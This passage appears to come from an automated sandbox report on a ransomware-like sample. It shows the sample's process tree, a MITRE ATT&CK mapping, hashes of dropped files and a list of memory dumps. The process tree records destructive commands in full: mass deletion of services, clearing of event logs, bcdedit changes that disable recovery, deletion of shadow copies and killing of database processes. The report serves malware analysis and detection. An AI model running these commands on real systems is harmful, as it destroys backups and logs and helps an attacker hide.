sc delete GPSFtpd
5⤵
PID:4804

C:\Windows\SysWOW64\sc.exe
sc delete "Zabbix Agent"
5⤵
- Launches sc.exe
PID:500

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecAgentAccelerator
5⤵
PID:3032

C:\Windows\SysWOW64\sc.exe
sc delete bedbg
5⤵
- Launches sc.exe
PID:6200

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecDeviceMediaService
5⤵
PID:7004

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecRPCService
5⤵
PID:5932

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecAgentBrowser
5⤵
PID:6884

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecJobEngine
5⤵
- Launches sc.exe
PID:6840

C:\Windows\SysWOW64\sc.exe
sc delete BackupExecManagementService
5⤵
PID:6872

C:\Windows\SysWOW64\sc.exe
sc delete MDM
5⤵
PID:7132

C:\Windows\SysWOW64\sc.exe
sc delete TxQBService
5⤵
PID:4036

C:\Windows\SysWOW64\sc.exe
sc delete Gailun_Downloader
5⤵
PID:5456

C:\Windows\SysWOW64\sc.exe
sc delete RemoteAssistService
5⤵
PID:3784

C:\Windows\SysWOW64\sc.exe
sc delete YunService
5⤵
PID:3792

C:\Windows\SysWOW64\sc.exe
sc delete Serv-U
5⤵
PID:5520

C:\Windows\SysWOW64\sc.exe
sc delete "EasyFZS Server"
5⤵
PID:644

C:\Windows\SysWOW64\sc.exe
sc delete "Rpc Monitor"
5⤵
PID:6132

C:\Windows\SysWOW64\sc.exe
sc delete "Nuo Update Monitor"
5⤵
PID:2132

C:\Windows\SysWOW64\sc.exe
sc delete OpenFastAssist
5⤵
PID:6212

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "AirSpaceChannel"
4⤵
PID:4412

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Analytic"
4⤵
PID:5344

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Application"
4⤵
PID:5592

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DirectShowFilterGraph"
4⤵
- Clears Windows event logs
PID:6676

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DirectShowPluginControl"
4⤵
PID:7100

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Els_Hyphenation/Analytic"
4⤵
PID:7012

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "EndpointMapper"
4⤵
PID:5056

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "FirstUXPerf-Analytic"
4⤵
PID:5184

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "ForwardedEvents"
4⤵
PID:5592

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "General Logging"
4⤵
- Clears Windows event logs
PID:7076

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "HardwareEvents"
4⤵
- Clears Windows event logs
PID:7092

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
4⤵
- Clears Windows event logs
PID:1004

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "IHM_DebugChannel"
4⤵
PID:5540

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"
4⤵
PID:4412

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"
4⤵
PID:5440

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"
4⤵
PID:6116

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"
4⤵
- Clears Windows event logs
PID:6576

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"
4⤵
PID:7056

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Internet Explorer"
4⤵
PID:2544

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Key Management Service"
4⤵
PID:3516

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
4⤵
PID:7044

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MedaFoundationVideoProc"
4⤵
PID:5884

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MedaFoundationVideoProcD3D"
4⤵
PID:5856

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationAsyncWrapper"
4⤵
PID:4116

C:\Users\Admin\Downloads\a-Xgjsx.exe
C:\Users\Admin\Downloads\a-Xgjsx.exe
3⤵
- Executes dropped EXE
PID:852

C:\Users\Admin\Downloads\a-Xgjsx.exe
C:\Users\Admin\Downloads\a-Xgjsx.exe
3⤵
- Executes dropped EXE
PID:788

C:\Users\Admin\Downloads\a-Xgjsx.exe
C:\Users\Admin\Downloads\a-Xgjsx.exe
3⤵
- Executes dropped EXE
PID:4244

C:\Users\Admin\Downloads\a-Xgjsx.exe
C:\Users\Admin\Downloads\a-Xgjsx.exe
3⤵
PID:820

C:\Users\Admin\Downloads\a-Xgjsx.exe
C:\Users\Admin\Downloads\a-Xgjsx.exe
3⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:5112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
4⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
4⤵
PID:4760

C:\Windows\System32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:1568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
4⤵
PID:3208

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
5⤵
PID:4116

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4064

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:504

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4140

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:196

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:644

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
1⤵
PID:5896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Realtek11nSU
2⤵
PID:6652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
1⤵
PID:6356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1592

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5328

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "memcached Server"
1⤵
PID:6108

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

Impair Defenses

T1562

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt
Filesize
1KB

MD5
668b20364b5dcae7a78778e1f2a33c02

SHA1
e1db7697e7fe913814f05ab43e504da434d45514

SHA256
52899b2c2321ac2206e495899652f8fe01899ccb9f54849e81f6e1ba3c736c05

SHA512
64531823aaac27223a71f85cfcb21aace5c3ac351dc9c54b88f6f9e92c07a684e543a64dc9349b9077305c584c39f17e33707815c9b2ef3b2f42820638036d22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
570B

MD5
dcf125435524c0635986d863567cf0ac

SHA1
2de5ce678494a2d07510deeeaa32eac0f6c6351d

SHA256
7f7201a8fafa73a5c7a36dfdecc07e0a20788b6d4f8951b7f64095f0d44e0b07

SHA512
0176cc8fce40837e90280abebb1f40b22b61fffcb65195ee177f41c62eb7f3c6daf0b5183067d16b9e7700ce882cce69a17e438b3a56b8ea77360bd92383c023

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
905fbefb9b9795db6aa684d01fa1ad7e

SHA1
8728445c60596ae90fef8c9f8d1c56fd7e69b4fb

SHA256
20691623646b6ebd1fb51a55e7bd9e8bde3c8289dd752dc8550dbd1254c9c6ec

SHA512
409958b2a9f0571154746e8b6397be2f0e154b901dc97c879ad6e255dd211c21d412a447b19255242af6ecbc0cb9de7f70da8ba6fa7273444587150bce4ad73d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
fcf1b69a26aedd8b9fa9f4c7d4754302

SHA1
8283b320fe686a26c7a377c8684c2dc970b74c94

SHA256
96ea951f6efe62d1ae8fdb45da8138d96295d93d0ae732ae91deee505ab367a7

SHA512
9511e2fe7f69188b732ec4f0aefbc398575a8c73a951b53b365cd4d54ea6c9882736a110baef85751b1c9956f41bace14b5aaa92c1d7599175b538d2f87b1a18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
67ad5d547540e215fe026f00dc78353f

SHA1
d6944dc30a5754a68321ad7e17244bdc49778620

SHA256
2a950859066f0390a8c8a1d46ea08fa030359298524c8c9d4f7ae1281d91025c

SHA512
08f4ba40ead607020e94179390a451df23b20286f45b3cfb7f6bc65e0639175e5827bc77e46686280d866864b346fe8e9c43a07b55436392d6a44946e68b2db4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
146KB

MD5
144c71f40b6f8a4f4b6229f5fd0e99c5

SHA1
16a1c799fa6e56412ac4d4b87a0054921fa46232

SHA256
de68b465ff321cab7b9e9a056a5cb1dcfe1d43dd584f5d674705967ea0b70091

SHA512
1fa1d4efbd4923446fc108a7a7ce24ca2b9b02afbeb5f14e2669fef21cb3ed15086bbe9ed305c644ee8fbf1a1c906263702081955878d486b5b341db1f72930a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
146KB

MD5
4e1983351061af2cf091d037c924e0b7

SHA1
095d19edade67ca1082e40b5c80c5bc6935b3aa7

SHA256
5fc6aedfa929f406af4cc42c769a564bd9998c1d6bb46a130cad9c34b6da99cb

SHA512
64125407a2fda0701cdcbbfebd217227e1afb652cbcf79eb8e64e59be8db00a25c3b29614805cce0fa6e43b444e57159cf18ce80a7cccb2d9f5bb18700169dbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
72KB

MD5
8e23a2f10c9e0586c99d3acf2bdd799e

SHA1
1e1145fabf442e743bd9462359bd54bb21e951a6

SHA256
fa851584e06d0d82641b9d1fd075f2f6a69eeb30302fee0642de365b1edc5394

SHA512
8d7e639470f12b973a40c2fbcb3f34d29a9dd1187d6f09155d5fe202ff4f2f37cd076cd7e91205810318ed77eb545184f4cc36106af014280c1090fd54502606

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
106KB

MD5
1aeaa13173149df4fabeeb6781f3406a

SHA1
37482e545127a15fe2f682fdb2b85fb0ea26decb

SHA256
1bee306a5d3190ba70380eaa7c239443f40641bd87f4c1c94fbfafb614510838

SHA512
3fd97a21185a509856a6fc85661ccfc36d136c8bc672995a1ee6a13ae1bf0004f953d71df61ebbd4f5545a5273a88b77f3e686bfbfade33c5d078387a5a669f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe56d007.TMP
Filesize
100KB

MD5
adcd791074c58a3581e5b1a0deb0d870

SHA1
c64cf0e2406049a315aa40eb62a1c5da36bd919e

SHA256
f69b11c07a2cba8422c7ca7d956d2ffb67647a10bd06fd3077a1a361e2061029

SHA512
9bae47e91732c5765f3aa6623e39014f407276502961f28feb5cb18a0b022debf8a9d50b6265477703c654f0603a5c195f03a948958a4d7ea8df81bb95fac574

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat
Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sktknynm.rd0.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
C:\Users\Admin\Downloads\a-Xgjsx.exe
Filesize
530KB

MD5
57c683e8ab7b7e1390c037c9a97c7688

SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7

SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096

SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953

Download Submit
\??\pipe\crashpad_996_SUFTNDISMEQADRGE
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1156-205-0x00000000072D0000-0x00000000072E0000-memory.dmp

Filesize
64KB

Download
memory/1156-319-0x00000000072D0000-0x00000000072E0000-memory.dmp

Filesize
64KB

Download
memory/1156-208-0x00000000087E0000-0x0000000008856000-memory.dmp

Filesize
472KB

Download
memory/1156-206-0x00000000072D0000-0x00000000072E0000-memory.dmp

Filesize
64KB

Download
memory/1156-204-0x0000000007F40000-0x0000000007FA6000-memory.dmp

Filesize
408KB

Download
memory/1156-232-0x000000000A020000-0x000000000A698000-memory.dmp

Filesize
6.5MB

Download
memory/1156-233-0x00000000095C0000-0x00000000095DA000-memory.dmp

Filesize
104KB

Download
memory/1156-203-0x0000000007790000-0x00000000077F6000-memory.dmp

Filesize
408KB

Download
memory/1156-202-0x0000000007910000-0x0000000007F38000-memory.dmp

Filesize
6.2MB

Download
memory/1156-201-0x0000000005010000-0x0000000005046000-memory.dmp

Filesize
216KB

Download
memory/1156-207-0x0000000008480000-0x000000000849C000-memory.dmp

Filesize
112KB

Download
memory/1156-320-0x00000000072D0000-0x00000000072E0000-memory.dmp

Filesize
64KB

Download
memory/2680-12828-0x0000000000110000-0x00000000001BE000-memory.dmp

Filesize
696KB

Download
memory/4700-195-0x0000000006460000-0x00000000064F2000-memory.dmp

Filesize
584KB

Download
memory/4700-318-0x0000000004F60000-0x0000000004F70000-memory.dmp

Filesize
64KB

Download
memory/4700-194-0x0000000006370000-0x00000000063BB000-memory.dmp

Filesize
300KB

Download
memory/4700-193-0x0000000005FF0000-0x0000000006340000-memory.dmp

Filesize
3.3MB

Download
memory/4700-192-0x0000000005EA0000-0x0000000005FEC000-memory.dmp

Filesize
1.3MB

Download
memory/4700-191-0x0000000004F60000-0x0000000004F70000-memory.dmp

Filesize
64KB

Download
memory/4700-196-0x0000000006560000-0x0000000006582000-memory.dmp

Filesize
136KB

Download
memory/4700-190-0x0000000004CD0000-0x0000000004CDA000-memory.dmp

Filesize
40KB

Download
memory/4700-189-0x0000000004D00000-0x0000000004D92000-memory.dmp

Filesize
584KB

Download
memory/4700-188-0x0000000005160000-0x000000000565E000-memory.dmp

Filesize
5.0MB

Download
memory/4700-187-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/5112-347-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-12836-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-344-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-342-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-348-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-349-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-350-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-351-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-352-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-353-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-354-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-357-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-358-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-355-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-361-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-360-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-363-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-364-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-365-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-366-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-368-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-367-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-339-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-2067-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-2941-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-12027-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-12856-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-337-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-343-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-12837-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-12841-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/5112-12854-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/6108-12827-0x0000000077010000-0x0000000077011000-memory.dmp

Filesize
4KB

Download
memory/6988-13566-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-12888-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-13656-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-12906-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-12905-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-12907-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-12908-0x00007FF716610000-0x00007FF716620000-memory.dmp

Filesize
64KB

Download
memory/6988-12926-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-13655-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-12886-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-14759-0x00000000216A0000-0x00000000217A0000-memory.dmp

Filesize
1024KB

Download
memory/6988-12887-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-13564-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-13657-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-13658-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-13660-0x00007FF716610000-0x00007FF716620000-memory.dmp

Filesize
64KB

Download
memory/6988-13806-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-14261-0x0000000020740000-0x0000000020C66000-memory.dmp

Filesize
5.1MB

Download
memory/6988-14704-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download
memory/6988-14716-0x0000000020450000-0x0000000020502000-memory.dmp

Filesize
712KB

Download
memory/6988-14738-0x00000000216A0000-0x00000000217A0000-memory.dmp

Filesize
1024KB

Download
memory/6988-13561-0x000000001D470000-0x000000001D480000-memory.dmp

Filesize
64KB

Download